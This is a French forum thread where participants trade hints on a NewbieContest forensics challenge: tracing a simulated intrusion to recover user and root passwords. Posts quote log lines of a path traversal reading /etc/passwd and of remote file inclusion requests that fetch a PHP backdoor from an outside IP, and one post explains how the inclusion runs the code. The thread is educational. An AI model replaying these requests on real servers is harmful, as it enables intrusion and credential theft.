NewbieContest

Postez ici vos messages.

J'ai bien aimé cette épreuve même si elle me semblait trop facile :)
Ou bien j'ai eu de la chance, ou bien je suis trop fort

Elle étais simple. :)
La deuxieme le sera moins :)

Chouette :)

Facile, facile, pas tant que ça pour un noob comme moi :cool:
Enfin c'est pas dur mais faut le temps de comprendre le principe :-P

Moi il ya des trucs qui me choquent dans certains fichiers... je comprends pas les x a chaque ligne, en theorie c'est pas ca ???
Sinon au mons ca change des autres epreuves !!!

Enjoy

The lsd

Une petite question:

pour la concaténation des mdp, il faut taper le "+" ou pas?

    root_passwd+john_passwd

ou

    root_passwdjohn_passwd

bah de toute façon c'est aucune des réponses que je pensais. :/

Il y a moyen d'avoir un petit indice pour le mdp root?

Il y a une diversion ou bien il faut vraiment faire une attaque PKI (j'essaie de pas donner trop d'info)?

StCyr

Retrace bien toute l'attaque, surtout comment le mdp root a été obtenu, tu trouveras la réponse à ta question.

Ha!? On sait voir ça... Je suis complètement passé à côté tiens.... :?

C'est comme l'accès RFC959 (j'obfusque, j'obfusque ;) ): Les traces sont suffisantes pour comprendre comment il l'a eu?


StCyr

Oui

Franchement je vois pas :(

Il exploite une faille php hyper-classique qui lui permet  de trouver un pass rfc959 (soit d'en créer un).

Du coup il upload "tu sais qui".

Il trouve john.

Ensuite on sait pas ce qu'il fait pendant 24 minutes... et hop magie :?

J'ai comme un trou...

et il faut mettre un "+" entre le pwd de root  et le pwd de john? ou pas?

StCyr, la meilleure réponse à ta question en ce qui concerne le +, c'est de tester avec ou sans, tu t'en rendras compte tout de suite (si les 2 pass sont bons).

ouf j'y suis...

C'était ma lacune habituelle en "histoire" :D

Salut à tous,

Je cales pas mal là... J'ai, je pense, réussi à obtenir le mot de passe de john qui n'est pas trop difficile cependant je n'arrive pas à retrouver le mot de passe du root.

Car j'ai comme un trou ce qui gêne plutôt beaucoup mes recherches...

Merci si quelqu'un peut m'aider un tout petit peu sans bien sur donner la solution.

Cordialement Inazo.

Je n'ai pas trouvé moi-même, mais je cherche du côté de kde-keyring..., puisque le hacker a effacé un fichier qu'on aurait bien aimé éventrer

Pffff... j'ai le pass de john, mais pas celui du root bien sur, ...pas facile a trouver!!!:/

Bon ben moi j'en suis au meme point que Stcyr quand il parlait du trou de 24 minutes. J'ai bien compris ce qui s'est passé avant, pour obtenir le pass de John, mais je calle pas comment il peut chopper le mdp root... :?
M'enfin, c'est deja bien il y a une heure je callais meme pas comment il avait pu avoir le pass de john ! ^^
Un p'tit coup de pouce serait pas de refus !

Enjoy

The lsd

J'en suis au même point que toi the lsd, sauf que je suis sur une piste :cool:
Ce post nous met bien sur la voie...

Mais il reste encore plusieurs choses que je ne comprends pas :/

Il faut se mettre à la place de l'intrus: qu'a-t-il pu bien faire après avoir craqué le mdp de john ? en reste-t-il des traces ?
Garder à l'esprit que l'intrusion est simulée et qu'il pourrait manquer des infos, afin de ne pas éliminer trop vite certaines pistes

bravo pour cette epreuve, on aimerai en voir plus dans ce style la et pourquoi pas un jour une section challenge analyse d'attaque ? :twisted:

bonjour
je suis un noob en fait j'ai trouvé la faille quand on peut remonter les dossier je voulais juste savoir comment s'appelle cette faille et comment la sécuriser

Merci

On la connaît sous plusieurs noms, les plus courants étant path traversal ou directory traversal.
Après, google un de ces termes en ajoutant des mots qui vont bien comme "protect from", tu trouveras un certain nombre d'articles sur le sujet.

Merci

Et ben plutot pas mal cette épreuve!!!!

Elle fait travailler la matière grise qu'il me reste! j'ai tout compris jusqu'à ce fameux trou de 24minutes et je cherche toujours ce qui s'est passé!
Pour un administrateur en herbe il en commets des erreurs! :p
Bref félicitation pour l'épreuve!!!!
TheWeasel

Salut! C'est épreuve est bien sympathique mais là je sèche... j'ai réussi à trouver le pass de John mais celui du root...  :cry:
Après l'analyse de plusieurs logs, je trouve bien le premier mais pas de piste pour le deuxième... :/
Pourviez vous me donner un petit indice... :oops:

c'est fait :) merci pour cette épreuve originale :)

Il est quand même peu réaliste que le hacker laisse autant de traces. Étant donné l'accès qu'il avait sur le serveur, il aurait du faire un rm -rf sur le dossier de log. Mais sinon, c'est une épreuve originale et intéressante.

hi there!

le genre d'épreuve que j'aime...je me retrouve un peu comme tout le monde, a savoir que le mot de passe de "l'admin" john est dans la poche, reste celui de root...et domage que je n'ai pu trouver "l'ombre" dans /etc  =D

Merci beaucoup pour l'épreuve elle me fait travailler dur là :P mais un petit indice tout léger pour le mdp root...j'ai du mal a avancer.. :D

Amitié, Abigor

Il y a deja un indice pour le pass root dans le topic, faut juste lire et reflechir un peu.

Enjoy

The lsd

Salut j'ai bien révisé mes cours d'histoire mais j'ai l'impression que je fais une erreur quelque part... Y a t-il un rapport avec le serpent?

je suis absolument convaincu d'avoir trouver les bons pass mais erm.. il n'y a rien a faire je ne peux pas valider l'épreuve mais bon pour la forme :

Modération : t'es pas au courant que c'est mal de dire ce genre de choses en public ? Que ça soit correct ou pas, on dit pas ça.

c'est bien ca ?

woaw... première lettre suivi d'une étoile, suivi de la dernière lettre. je n'ai pas mis aucun indice concernant la longeur des mot de passes ou même comment les obtenir faudrait pas faire du zel non plus la ...

bref j'aurais préféré une réponse plutot qu'une censure..

Il faudrait ouvrir un dictionnaire (je le dis à toi, mais aussi à tous ceux qui dégainent le mot "censure" à tort et à travers). Il n'y a pas de censure sur NC, mais une modération à posteriori.
Donc, en ce qui concerne la suppression de ton texte, c'est très simple : le modérateur n'a pas forcément validé l'épreuve, et il n'a pas forcément idée de la réponse. Et de toute façon il y a une règle : on ne dévoile pas de méthode de résolution (fausses pistes comprises). Donc, le modérateur a modéré sans se poser de questions, et c'est très bien comme ça.
Enfin, pour clore le sujet et revenir à ta question : si ça ne valide pas, ce n'est pas la bonne réponse. C'est tout.

honnêtement, étant donner que j'ai une vie.. je vais prendre le risque de me faire bannir, mais sincèrement, tes réponses a deux balles et ton manque de tacte envers l'usage de mon français, tu peux t'abstenir
modération = censure de la seconde ou on retire un mot ou autre d'une phrase dans le but de le sortir de son contexte c'est de la censure

tien pour ta connaissance personnelle :

Définition du mot : censure

Nom féminin singulier
   contrôle exercé par le pouvoir politique ou religieux sur les spectacles, ouvrages et manifestations culturelles ou sociales
   fait de censurer, d'interdire un livre, un spectacle, un propos
   sanction de défiance prononcée contre un élu ou un gouvernement
   fonction du censeur, chargé de la surveillance d'un lycée ou collège <------- ou un forum ..
   (psychanalyse) refoulement

Définition du mot : modérateur

Nom masculin singulier
   personne raisonnable qui calme les tempéraments excessifs
   (technologie) substance qui, dans un réacteur atomique, ralentit la vitesse de neutrons et régule une réaction en chaîne
   mécanisme qui a pour fonction de régulariser un mouvement <----- dans notre cas on parle de discutions sur forum

je ne dis pas ça de façon péjorative les modos ici font un travail extra-ordinaire, cependant, ça ne te donne aucunement le droit de faire ton intéressant en répondant a quelque chose qui ne t'étais pas adressé. deuxièmement

ceci étant dit.. ton classement de 7/13000quelque, félicitation mais sauf si tu as quelque chose de constructif a dire tu peux tout simplement te taire. puisque tu n'es pas l'individu en question qui avait CENSURÉ mon post.

ET oui vu la description du dictionnaire le mot censure est applicable.

et encore une fois.. si ca ne serait pas des boulet de ton genre, le forum woaw... un des plus propres que j'ai vu.. les modos et admin ce sont investit a fond et continue de le faire.

Les petits nouveaux qui peuvent pas s'empêcher de l'ouvrir pour se faire remarquer, surtout quand le rapport signal/bruit est aussi faible que ça, c'est pas bien nécessaire, hein.

Quel dommage que les prêcheurs soient toujours les derniers à appliquer ce qu'ils disent :rolleyes:...

lol ... peut-être que le rapport signal/bruit est faible comme vous le dites, cependant ça prouve que je me suis débrouiller seul jusqu'à maintenant alors pourquoi j'aurais parler ? de toute façon ce qu'on dit est censuré et de toute façon on va mettre quelque chose au claire. :

1-Je suis membre depuis environs 2semaines donc le rapport signal/bruit est tout a fait normal.
2-mon but n'était absolument pas de partir une guerre loin de ça, c'était d'avoir un hint concernant un problème que j'ai rencontré.
3- il n'y a pas de trois. j'ai plus de temps à perdre..

Bye...

Quand est-ce qu'ils se décideront à apprendre aux enfants à compter à partir de zéro???

==> []

Ho ba enfaite elle est pas bien compliqué celle la...

Mais très bien réalisé. Merci au concepteur !

Bonjour a tous je voulais simplement savoir si je cherche du bon côte en essayant de voit du côte de password.save ^^ j'ai du mal a le "traiter" j'ai pourtant il me semble la bonne méthode ... manquerait-il un "=" ?
Merci pour votre aide

Personne pour un indice pour le mot de passe root, je seche total :S

J'ai bien cherché autour des failles de debian mais pas resultat... Faut il que je continue sur cette voie ?

Tu ne le trouveras pas en cherchant des failles debian mais plutôt en cherchant à savoir tout ce que l'attaquant a pu faire une fois authentifié en john.

Bonjour,

Je suis presque sur d'avoir trouvé les bons mots de passes, seulement j'ai un petit souçis pour la validation/concaténation des 2 passes.. serait-ce possible de MP un admin pour être sur ?

Merci d'avance

Je sèche sur le mot de passe root ...
Il est normalement sotcké en chiffré dans le fichier /etc/shadow mais ce fichier n'existe pas :(
Quelqu'un peut me donner une piste ?
Cordialement, SWH

C'est qu'il est normalement dans /etc/shadow, cependant ce fichier est uniquement accessible par root, donc pas par john.

Je dois vraiment pas être doué... Je suis sur d'avoir le password root vu que c'est la première idée que j'ai eu pour le trouver. Par contre le mot de passe de John ???

Est-ce que le fichier avec des ^M^M est bien celui qu'il faut lire ? Parce que vi il semble pas aller à la ligne...

[edit] Bon en fait je me tais et je relis l'énoncé avant la prochaine fois il faut mettre mot_de_passe_root+mot_de_passe_de_john pas l'autre sens...
Sinon pour vi (ou vim) ça lit pas comme il faut il faut utiliser un éditeur "plus" évolué  :cry:

le coup "C'était ma lacune habituelle en "histoire"" m'a bien mis sur la voie  :wink:

Personne a d'autres indices? car la j'ai aucunes idées après 24min et magie.

Ok, voici les lettres du pass de John dans le désordre : "péoul".

Plus sérieusement, je suppose que tu n'as aucun des 2 pass, donc, pour celui de John, en réfléchissant un peu et en cherchant il est plutôt simple à trouver en fait, et pour celui de root il s'agit d'une technique connue de recherche d'infos sur unix.

loupé, j'en possède déjà un c'est le deuxième qui me pause problème ^^

Bonsoir,

Comme beaucoup j'ai récupérer le passwd de john et je pense avoir retracer en grande partie ce qu'à fait le hacker.

En résumé et en évitant de donner trop d'indices :
/*censored par the lsd : ouais c'est ca, mais chut, faut pas le dire à voix haute ! */

enfin pour le root, il y semble y avoir un lien avec le file system ... mais je bloque

suis je sur la bonne voie, à l'ouest ?


une petite piste serait la bienvenue

thanks

Question qui peut sembler idiote, mais doit-on utiliser un sytème Linux pour résoudre cette épreuve ?

(je pose cette question, car il y a plusieurs binaires dans certains dossiers qui chargent des bibliothèques
Linux et qui pourrait peut être servir à trouver le password root ??)

Deuxieme question, pas besoin de coder un programme pour bruteforcer le password root à partir du dico via la page de validation de l'épreuve ? ( je sais que le bruteforce est interdit sur le site, mais c'est juste pour avoir une confirmation)

thanks

non et non

desoler mais je galere sur cette epreuve.
je ne trouve meme pas le pass de john:(
faut-il decripter le pgp? si oui je ne trouve pas de logiciel qui tourne sur window.
le pass est-il la dedans?
merci de votre aide.
au risque de passer pour un boulet.

pour le password de john je te dirais une chose : "man grep"

en revanche j'aimerais bien une piste pour le password root car je stagne

si c'est ça,je l'ai trouver depuis un moment alors...
merci kalao!

la difficulté de l'épreuve réside dans l'obtention du password root

pour cela faut bien retracer ce que le mec a fait une fois qu'il est logué sous le user john.

malheureusement je sèche lol

En effet c'est toute une histoire ça =)

Si j'ai bien compris, il faut lire un certain fichier caché contenant "histoire", mais pas forcément en français?
Si c'est ça, je l'ai déjà lu, mais j'ai rien trouvé... Je suis peut-être passé à côté :/

Ça y est j'ai réussi, l'épreuve n'était pas si difficile que ça

conseil : ne pas partir sur une piste trop compliqué

C'est un conseil ou un indice?

Je pense que c'est juste un conseil

Enjoy

The lsd

Le password root doit il etre donnée en clair ou hashé ?

Ça fait partie des choses que tu dois trouver par toi-même ;)

pour l'analyse apres attaque,il  y a un mag sur hakin9.org,faut vous inscrire par mail et telecharger le numero virus sur linux et dans ce nimero vous trouverez une article sur l'analyse :wink:

Bonjour a tous !

Je suis sur cette preuve depuis quelques heures maintenant et je butte...
En relisant mes livres d'histoire, j'ai decouvert le mot de passe de l'utilisateur ftpsite,
et j'ai reussi a remonter le fil du temps jusqu'au 53eme mot de passe de John.
Et puis je me suis demande ce qu'avais bien pu faire ce messieur avec le mot de passe de John.
Alors j'ai farfouille et je suis tombe sur ce que je pense etre un exercice de bonne foi...

Du coup, pensant avoir tous les pass, j'ai tente ma chance sans resultat ...
Un petit indice serait vraiment le bienvenu svp !!

PS : J'aime bcp cette epreuve, un peu de "detectivisme", ca fait toujours plaisir ;)

D'après ce que j'ai pu comprendre, tu as le bon 2nd pass, mais pas le bon 1er. J'ai eu aussi la logique que tu as, sans succès, mais il ne faut pas oublier que c'est qu'une simulation. Regarde mieux ton premier fichier, un détail peut t'aider.

Hum...
Merci d'avoir répondu, cela m'encourage de savoir qu'a priori, j'ai deja un mot de passe correct ^^
En revanche, ta réponse me déstabilise un peu, je m'explique :

Comme dirait Perceval, "Le nord, on fonction de la direction que l'on regarde, ça change tout !!"
Du coup, si tu me dis que mon second mot de passe semble correct, tu parles duquel :D ?

Parce que j'ai 3 mots passe : celui du ftp, celui de john et celui du root.
Du coup, tu fais référence a celui du root comme 2eme ?

Ou alors tu parles en fonction de la validation ?
Le deuxième étant ainsi celui de John...

Rhaa, c'est complique la vie ...  :?

Edit : Merci tarzanlefumeur pour cette 2eme réponse ... valide ^^

Ouais c'est vrai que c'est fait un peu à l'envers et on s'emmêle vite... Si t'as bien fait, ton bon pass est celui du root.

Pour être plus précis :
Ceci ne tient pas, cf le fait que c'est une simulation.

Bon courage.

Bonjours, c'est mon premier post sur le forum ^^ mais là j'avoue que je galère:
Je cherche depuis un certain nombre d'heures (dsl j'ai pas calculé mais ça commence a faire pas mal ^^) le mot de passe du root, je pense avoir trouver celui de john dans une b**** et je cherche le root, j'ai donc relu mes cours d'histoire. Deja j'y ai pas compris grand chose puis a force de le lire, le serpent m'a intrigué a-t-il un rapport avec le root?

Merci de me censurer si je suis trop expressif mais je pense pas en dire plus que certains.

PS:Si quelqu'un peut me mp pour m'indiquer un piste

Bonjour, j'ai trouvé le mot de passe de john et j'ai donc chercher ce que je pouvais en faire, l'exercice m'as semblé assez facile mais la solution qui me saute aux yeux est un hash extrêmement long que je n'arrive pas à décrypter.
Serai-je sur une mauvaise piste?

Ca dépend ce que tu veux dire par "extrèmement long" mais oui je pense que tu fais fausse piste :)

J'ai compris mon erreur, ne jamais faire confiance a son explorer, si on veut qqch de caché ben il faut le chercher.
Du coup j'ai je pense le bon mdp pour root, enfin à un décryptage près.

edit: enfin je patauge encore donc je commence a avoir quelques doutes.

Bon j'avais un peu laisser cette épreuve de coté pour non résultat et je la reprend maintenant et je me met a remettre en question mes résultats.
Je pense avoir trouvé le mdp root /* moderated par the lsd : l'indice était bien trouvé et drôle, mais ça fait trop quand même pour que je le laisse. */
Mais la solution n'est pas accepté par l'input donc j'en déduit que je n'ai pas le bon mdp john. Peut t'on retrouver ce mdp en comptant les requête dans le fichier log ou est plus subtil?

Edit:j'ai mas réponse, suffi de regarder correctement toutes les entrée du fichier.... je me sent con...

Bonjour ! je ne poste pas souvent sur les forums mais la j'aimerais une petite indication s'il vous plait : quel genre de connaissance faut-il avoir pour aborder ce genre d'épreuves ? Avez-vous de bons tutos a me conseiller pour debuter ?

merci beaucoup :)

EDIT: je pense avoir trouvé le mot de passe de john, mais pour celui de root, est-il crypté et faut-il le decrypté, ou apparait-il en clair ? (parce que j'ai recuperer ce que je pensais etre un mot de passe crypté, mais apparemment ça n'en est pas un .. :( )
merci :)
EDIT2: exactement comme zangdar-64 je croyais avoir trouvé le mdp de john mais maintenant que j'ai celui de root et que ça valide pas je me remets en question xD je sens que je touche au but...
EDIT3: y a pas un probleme avec cette epreuve ? si on se rapporte a ce que dis tarzanlefumeur (observe bien, un indice peut t'aider dans ton fichier), je crois avoir compris ce que c'etait et trouvé le mdp de john mais en ce qui concerne le mdp du root, j'ai bien regarder sous la cape invisible pour voir ou se cachait le mechant cobra des tenebres et j'ai essayé de le aché avec mon ache super puissante, mais il me trouve rien... Meme en faisant comme les flics (taper sur le cobra a grand coup de dico jusqu'a ce qu'il crache le morceau), il me dis que dalle...

je pense etre suffisamment implicite mais censuré moi si ce n'est pas le cas...

Est-ce que quelqu'un peut me dire si les scripts Python ont un quelconque rapport dans l'affaire ou bien je suis sur une mauvais piste?

Bonjour,
cette épreuve est super sympa. Mais de même que Harry41, je possède le mot de passe root (la manière de l'obtenir est assez vile je trouve :evil: :D ) et je butte sur le mot de passe de John. J'ai fais comme lui et compté jusqu'à 53, et je commence à me demander jusqu'à quel point il faut prendre en compte le fait que c'est une simulation d'analyse d'attaque.
tarzanlefumeur si tu es dans le coin, peux-tu m'indiquer à quel degré on peut se fier au listing/timing/nombre des fichiers journaux ?

Merci d'avance

Pour ichigo2707 : tu possèdes le pass root, tu n'as qu'à apprendre à jouer avec le serpent pour le vérifier, pas besoin de tour de passe-passe ou d'en appeler à un autre John normalement.

Si le fichier /etc/shadow était dans l'archive, on aurait pas tant de problèmes !  :P

Excellente épreuve  =D

je viens juste de la valider  :cool:

merci!!!

Bonjour,

J'ai abordé cette épreuve en me livrant à une analyse de chacun des fichiers, mais, d'une part, par leur nombre, j'ai peur que mon analyse ne soit pas assez poussée, d'autre part, je ne sais pas bien quoi rechercher.
Par ailleurs, je vois très bien le "trou" de 24 min dont il est fait référence au début de ce topic, mais je ne vois pas quoi en tirer.
Auriez-vous des indices, conseils, qui puissent m'aider à résoudre cette épreuve ?

Bonjour à tous,

Est-il possible d'envoyer le mot de passe john par mp pour validation ? Si quelqu'un l'a terminé qu'il lève le bras que je lui envoi ça :)

Bah, si t'as le mdp de john tu doit le savoir normalement, mais bon si tu veux...

Bon et bien pas assez de points pour pouvoir mp... donc comme ça c'est réglé :)

Autant le pwd de ftpsite et de john sont assez clair à trouver , autant celui de root, trouvé par notre intrus apres 24 minutes d'attente est un mystère pour moi ! D'où sort ce fichier PGP est un mystère aussi ...

Salut à tous!
Premier post (je crois)...
Bon voilà, évidemment, je rame!
je pense vraiment être sur la bonne voie, c'est à dire, dans un certain fichier, /* moderated par the lsd : spoil spoil spoil ! A MORT LE SPOIL ! */
Donc je dois faire fausse route.
Question: le pgp est-il prépondérant ou facultatif? Si oui, tout les éléments de décryptage sont-ils disponibles?
enfin, tout les horodatages sont-ils valide?
Quel impact sur la recherche le fait que ce soit une simulation?
Merci pou une éventuelle mise sur la (dé)route :)

http://www.newbiecontest.org/forums/index.php?action=profile;u=20865;sa=showPosts

Nan, c'était pas le premier post ;)

Ha oui pardon, mais c'était il y a longtps... ça compte encore? :cool:

Bon ça y est, j'ai validé...
J'en profite pour donner un petit conseils à ceux qui sont encore dessus et qui bloque:
Comme c'est une simulation, il vaudrait mieux que vous montiez (en réèl ou virtuel) une config linux histoire de refaire vous même le hack, croyez moi cela m'a débloqué...

Bonjour !!
mon (réel) premier post de demande d'aide.. parce que là je pète un boulon.
j'ai bien le bon mot de passe root, trouvé "assez" facilement grâce à mes 2 berretas et ma corde à piano.
Le problème vient du mot de passe de john.. je compte, je recompte, et je rererecompte encore.. mince, c'est pas ça..

Je viens lire le forum, et certains ont eu le même problème que moi. J'ai donc décidé de prendre les mots de passe se trouvant dans l'intervalle [-5,5] avec 0 étant le nombre de tentative. Toujours rien... . J'agrandis l'intervalle, toujours rien.

Je ne vois pas ce que j'ai manqué.

Yop,

Je galère aussi sur le même mot de passe, c'est marrant parce que quand on lit le topic on voit que les premiers qui galéraient ne trouvaient pas le mot de passe qu'on a trouvé (merci les astuces quand même, ça doit y jouer) et maintenant c'est l'inverse, Q_Q.

Ça doit être cool d'être présent sur une épreuve le jour de sa sortie, là même si y'a toujours le challenge y'a (quasiment) pas de communication ^^

Salut,

Si tu galères sur le mot de passe de l'utilisateur john, cela pourrait t'aider.

Bon je viens de valider cet épreuve, en qlq sort "c facile"...pour ceux qui n'ont pas encore valider cet épreuve je vais vous aider par qlq indices.

/* moderated par the lsd : ouais, ben oupa hein ! Tu donnes limite la solution...*/
Bonne chance !!

en fait t'écris en abrégé, même  ton pseudo! le problème c'est qu'on comprend pas quand y a trop de lettres qui manquent!

Salut merci pour cette épreuve :) elle est super

mais je n'arrive pas a trouver le pass de john
J'ai trouver un fichier contenant ces info : Oct 15 21:34:40 chaos proftpd[6312] 199.230.171.106: FTP session opened.
Oct 15 21:34:42 chaos proftpd[6312] 199.230.171.106: USER ftpsite: Login successful.
Oct 15 21:34:57 chaos proftpd[6312] 199.230.171.106: FTP session closed.

Donc j'ai chercher dans celui repertioriant toutes les connection et j'y ais trouver ces activité : [15/Oct/2006:21:30:21 +0200] "GET index.php?page=/etc/passwd

[15/Oct/2006:21:31:08 +0200] "GET index.php?page=http://199.230.171.106/backdoor.txt

[15/Oct/2006:21:31:53 +0200] "GET index.php?page=http://199.230.171.106/backdoor.txt&file=pass.php
Je pense que l'intrus as le fichier contenant le mots de pass de john : pass.php
[15/Oct/2006:21:44:29 +0200] "GET images/thumbs/brutus.php
Mais pourquoi il upload brutus dans ce cas ??

et si ce pass.php existe bel et bien ou le trouver ?
Merci de m'aider suis-je sur la bonne vois ?

Salut a tous, sa fais depuis plusieurs mois que je suis sur cette épreuve et je n'arrive pas a trouvé le bout, est-ce que quelqu'un pourrait m'apporter un peu d'aide ??  En MP ?

Merci a vous !

Plusieurs mois ?
Je pense que tu peux changer ton avatar dans ce cas...
Un bon éditeur de texte et c'est validé !

Ouai stuveut ;) Mais sur ce cou la ta perdu une occasion de te taire !!

Si on évitait de régler les comptes sur le fil de discussion ça m'arrangerait je dois avouer

Enjoy

The lsd

Es-ce que sa sert pour le mdp john ???

ftpsite john13/04

et j'ai aussi trouvé hello04

Salut

Je m'attaque à cette épreuve hyper instructive.
Je pense avoir trouvé la faille (très connue) qui a permis à l'attaquant de passer à la deuxième phase de son plan machiavélique : trouver le mdp de john.
A partir de là, l'attaquant ne peut toujours pas avoir accès au mdp root car celui-ci est inaccessible dans le etc/shadow. Pour le récupérer, /* Modéré : inutile de le dire */ (très astucieux !!)

Problème : si j'ai bien compris la feinte, le mdp root que je récupère est donc censé être en clair... or, il ne valide pas l'épreuve (et il est plutôt long à transmettre)

Ai-je au moins bon sur le déroulement de l'attaque ?
Du coup, comment expliquer la drôle de syntaxe du mdp root (qui devrait être clair)?

PS : j'ai exécuté le /* Modéré */ sur un linux pour vérifier le résultat. La feinte est plutôt efficace !

Merci

Peut-être que c'est le mot de passe de john que tu n'as pas bien récupérer ?

La pass john est beaucoup plus difficile (selon moi) à récuperer que le pass root.
Il faut bien analyser les sources et les noms de fichiers ;)

Bonjour à tous,

Je me permets de poster car je bute sur cette épreuve qui est vraiment très intéressante notamment le fait de devoir fouiner afin de rechercher des traces.

J'ai commencé par analyser les logs du serveur apache. Il y a une ligne que je ne comprends pas et je me suis dis que peut être pourriez vous m'éclairer à ce sujet.

Voici la ligne en question :

GET index.php?page=/etc/passwd HTTP/1.1" 200 1679 "http://prive/"

le /etc/passwd je comprend  (Méthode DT) ce qui a été fait  et pourquoi. Ce que je ne comprends pas c'est "http://prive/"

Serait-ce quelque chose de cacher, un répertoire... ? Veuillez modérer si j'en dis trop.

Merci de votre attention.

Le plus simple est que tu regardes la configuration des logs d'accès apache, tu verras, après, tu comprendras  ;)

Enjoy

The lsd

Effectivement @The Lsd j'ai lu et j'ai compris enfin je pense.

Je pense être sur une piste concernant le mot de passe John, je pense qu'il s'est fait "cramé" ai-je bon ou ai-je tort ?

Un petit Up :)

Bonjour à tous,

Je me permets de revenir posté ici, car je suis toujours bloqué pour obtenir le mdp de john.

J'ai donc plusieurs questions :
/* moderated par the lsd : chuuut, un peu moins fort ! iirc, tu pars pas trop mal, mais faut pas le dire aux autres !*/
ça fait deux semaines que je suis dessus :'(.

C'est RE-moi :)

@TheLSD est-il possible d'avoir par mp le message que j'ai posté hier sans la modération car je ne me souviens plus qu'est ce que j'ai posté.

Désolé pour le dérangement.

si tu te souviens plus de ce que t'as fait à la limite le mieux est de recommencer  :rolleyes:

Je sais ce que j'ai fait mais je me souviens plus de ce que j'ai posté ce n'est pas la même chose.

Bonjour,

Pourquoi la backdoor est un fichier txt ? J'imagine que ce n'est pas une information importante pour la résolution de l'épreuve mais juste pas curiosité j'aurais bien aimé savoir !

Bonne journée.

Salut


Si tu fais référence aux fichiers avec une extention py alors il s'agit tout simplement de scripts écrits en langage python.

Ce langage est très utilisé surtout, sous linux et je ne peux que te conseiller de l'étudier.

Non je ne parlais pas de ça mais de la backdoor.txt que l'on peut voir dans les logs !

Dans les logs ok !
Alors je persiste, c'est peut être une backdoor écrite en python.
pour la lancer : python backdoor.txt
Quelqu'un a une autre idée ?

Salut,
la backdoor est incluse via une RFI (Remote File Inclusion). On le voit sur deux lignes de log :

[...] GET index.php?page=http://199.230.171.106/backdoor.txt [...]
[...] GET index.php?page=http://199.230.171.106/backdoor.txt&file=pass.php [...]

Le but, c'est que le contenu php de la backdoor soit executé sur le serveur de l'attaqué, et non pas sur le serveur de l'attaquant. Si l'extension était .php, alors le code serait exécuté par le serveur 199.230.171.106 et le résultat serait inclus là où la variable $_GET['page'] est incluse.
Ici, le comportement souhaité, c'est que le code php lui même soit inclus en dur dans la page index.php du serveur attaqué. Donc on veut que la réponse à l'appel http://199.230.171.106/backdoor.? renvoie le code php lui même. Quoi de mieux que de l'appeler backdoor.txt ? :)
Ensuite, comme c'est index.php et qu'il y a le code php brut de backdoor.txt, alors ça sera exécuté à ce moment là, par le serveur attaqué.

C'est pour cela que l'extension .txt est choisie.

D'accord je comprends mieux ! Je n'avais pas pensé que le script pouvait s’exécuter chez l'attaquant au lieu de la victime.
J'aime bien cette épreuve elle semble beaucoup plus réaliste que les premières  =)

Heuu... sans vouloir me méler de ce qui me regarde pas, on est pas dans les afterwards là, non ?

Non, mais ça ne donne pas d'indices/informations qui aident à la résolution de l'épreuve, donc pas de soucis

PS : Ces deux lignes de log ont déjà été citées dans ce forum

OK pour moi ;)
J'avoue ne pas avoir lu tous les messages ici, uniquement les tous derniers.

Bonjour à tous,

Sauf erreur de ma part, les fichiers ne sont plus disponibles :

Not Found
The requested URL /epreuves/hacking/offworld-analyse.zip was not found on this server.

Le fichier est ici : https://www.newbiecontest.org/epreuves/forensics/offworld-analyse.zip

J'ai déplacé l'épreuve hier et ai oublié de remettre le bon lien, désolé, je m'en occupe de suite
Merci d'avoir prévenu.


Enjoy

The lsd

Edit : fixed

Pas de souci, merci beaucoup :)

** Se dit qu'en 2 minutes c'est plié, charge un Live de OPH, charge le fichier, prends le temps du BF, et... PAF ! Perdu ça marche pas **

Du coup c'est un peu plus compliqué que prévu
J'ai donc joué le jeu, je pense avoir trouvé le pass de Johnny l'artiste (quoi que encore pas sur), j'ai compris comment le vilain méchant est entré, j'ai les traces de quelques navigation.. Mais alors pour trouver la bonne root... o0" Impossible de mettre la main dessus. Pourtant j'ai bien ouvert la quasi-totalité des fichiers, fais des recherche poly de certains mots.. Impossible.

Y'a il un ordre préçis à suivre en forensic ? (surtout quand on a perdu trace de Jack Sparrow ?)

Thx !

L'ordre c'est de chercher plus longtemps avant de poser des questions, et c'est pas la première fois que je te le dis ;)

Bonjour, je viens de commencer sur NC
je viens pas ici reclamer un indice ou autre, c'est  que avant de vouloir commencer a vouloir faire les challenges je voudrait savoir ou je pourrais m'informer et trouver des informations pour se sujet car dans tous les topics je suis perdu
Merci 

Salut et bienvenue ici,

Si tu es un peu perdu dans la liste des challenges proposés, je te suggère ce post de TouF assez bien fait :
https://www.newbiecontest.org/forums/index.php?topic=4463.0

Vis à vis de l'épreuve à laquelle tu te réfères ici, je dirais qu'il faut premièrement être à l'aise avec l'environnement Unix et ses outils, afin de pouvoir comprendre (et donc analyser) les fichiers de l'épreuve.

Good luck !

Après plusieurs années d'inactivité, j'ai eu envie de faire un petit challenge sur ma pause déjeuner.
J'ai l'impression d'être sur la piste, mais je me demande si je n'aurais pas plus vite fait d'installer une VM Linux sur mon MacBook...
Ou alors je me fourvoie peut-être ?  :rolleyes:

Ma foi, tu peux bien installer ce que tu veux ^^ Cela dit, nul besoin de kali pour ce challenge :)

Enjoy

The lsd